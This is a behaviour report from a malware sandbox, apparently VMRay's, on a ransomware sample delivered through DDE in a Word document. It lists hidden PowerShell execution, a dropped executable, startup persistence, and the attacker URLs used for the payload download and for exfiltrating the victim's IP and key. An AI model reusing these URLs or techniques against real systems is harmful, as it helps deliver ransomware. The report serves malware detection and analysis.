DDE Ransomware in a Macro-less Word document
| VTI by Score
Try VMRay Analyzer
|
VTI Score
100 / 100
|
|
| VTI Database Version | 2.6 |
| VTI Rule Match Count | 27 |
| VTI Rule Type | Documents |
|
File System | Modify content of user files |
|
|
Modify the content of multiple user files. This is an indicator for an encryption attempt.
|
|||
|
|
File System | Create many files |
|
|
Create above average number of files.
|
|||
|
|
Process | Create process |
|
|
Create process "C:\Windows\system32\cmd.exe".
|
|||
|
Create process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
|
|||
|
Create process ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle minimized -command".
|
|||
|
Create process "C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe".
|
|||
|
Create process "CMD.exe".
|
|||
|
Create process ""C:\Users\kFT6uTQW\AppData\Roaminghhfhqi2h.wln.bat"".
|
|||
|
Create process "C:\Windows\system32\taskkill.exe".
|
|||
|
|
Process | Execute encoded PowerShell script |
|
|
Execute encoded PowerShell script to possibly hide malicious payload.
|
|||
|
|
File System | Handle with malicious files |
|
|
File "c:\users\kft6utqw\appdata\roaming\nvss.exe" is a known malicious file.
|
|||
|
|
Network | Download data |
|
|
URL "w-szczecin.pl/img2/s50.exe".
|
|||
|
URL "beer-ranking.pl/gen/".
|
|||
|
URL "beer-ranking.pl/login/post.php?IP=87.142.159.51&ID=0b75c6dd-d172-492e-b7be-2c05de30e808&Data=17-10-2017%2001:10:26&Haslo=46sDISwJJE10uqPP7rx!K_*@KX(YL2yASBN@3SDx6)7!_HL7IR23RZY!FUT1H2@9*H40@r71qZWq_r7ISTutC2_RHSDYFxRCOG!JI3tIL0IL1A4D38H)UGQ!93Ty@wJIMF14r5xNOO8AZXNLO4Ktu@_(YTwRZO@u4W85K_D9Owtx2QRBF*EJ7DGO6LqP@@UYQNN!M15@68qSIS3YOrqFFH4w35UYZzFAW3urN9*E1*6tOT1(U2D9tq)65TNO23ZIQ3K)XGCIDsL2XxZB9!u**t32XBBJ(92OXxMDNZU02".
|
|||
|
URL "beer-ranking.pl/save.txt".
|
|||
|
|
Network | Perform DNS request |
|
|
Resolve host name "w-szczecin.pl".
|
|||
|
Resolve host name "v4.ident.me".
|
|||
|
Resolve host name "beer-ranking.pl".
|
|||
|
|
Persistence | Install system startup script or application |
|
|
Add "C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe" to windows startup via registry.
|
|||
|
Add "c:\users\kft6utqw\appdata\roaming\microsoft\windows\start menu\programs\startup" to windows startup folder.
|
|||
|
|
Network | Connect to remote host |
|
|
Outgoing TCP connection to host "91.231.140.161:80".
|
|||
|
Outgoing TCP connection to host "176.58.123.25:443".
|
|||
|
Outgoing TCP connection to host "82.221.129.19:80".
|
|||
|
|
PE | Execute dropped PE file |
|
|
Execute dropped file "c:\users\kft6utqw\appdata\roaming\nvss.exe".
|
|||
|
|
Network | Connect to HTTP server |
|
|
URL "w-szczecin.pl/img2/s50.exe".
|
|||
|
URL "beer-ranking.pl/gen/".
|
|||
|
URL "beer-ranking.pl/login/post.php?IP=87.142.159.51&ID=0b75c6dd-d172-492e-b7be-2c05de30e808&Data=17-10-2017%2001:10:26&Haslo=46sDISwJJE10uqPP7rx!K_*@KX(YL2yASBN@3SDx6)7!_HL7IR23RZY!FUT1H2@9*H40@r71qZWq_r7ISTutC2_RHSDYFxRCOG!JI3tIL0IL1A4D38H)UGQ!93Ty@wJIMF14r5xNOO8AZXNLO4Ktu@_(YTwRZO@u4W85K_D9Owtx2QRBF*EJ7DGO6LqP@@UYQNN!M15@68qSIS3YOrqFFH4w35UYZzFAW3urN9*E1*6tOT1(U2D9tq)65TNO23ZIQ3K)XGCIDsL2XxZB9!u**t32XBBJ(92OXxMDNZU02".
|
|||
|
URL "beer-ranking.pl/save.txt".
|
|||
|
|
PE | Drop PE file |
|
|
Drop file "c:\users\kft6utqw\appdata\roaming\nvss.exe".
|
|||
|
|
Process | Create system object |
|
|
Create mutex with name "Local\!PrivacIE!SharedMemory!Mutex".
|
|||
|
Create mutex with name "Global\.net clr networking".
|
|||
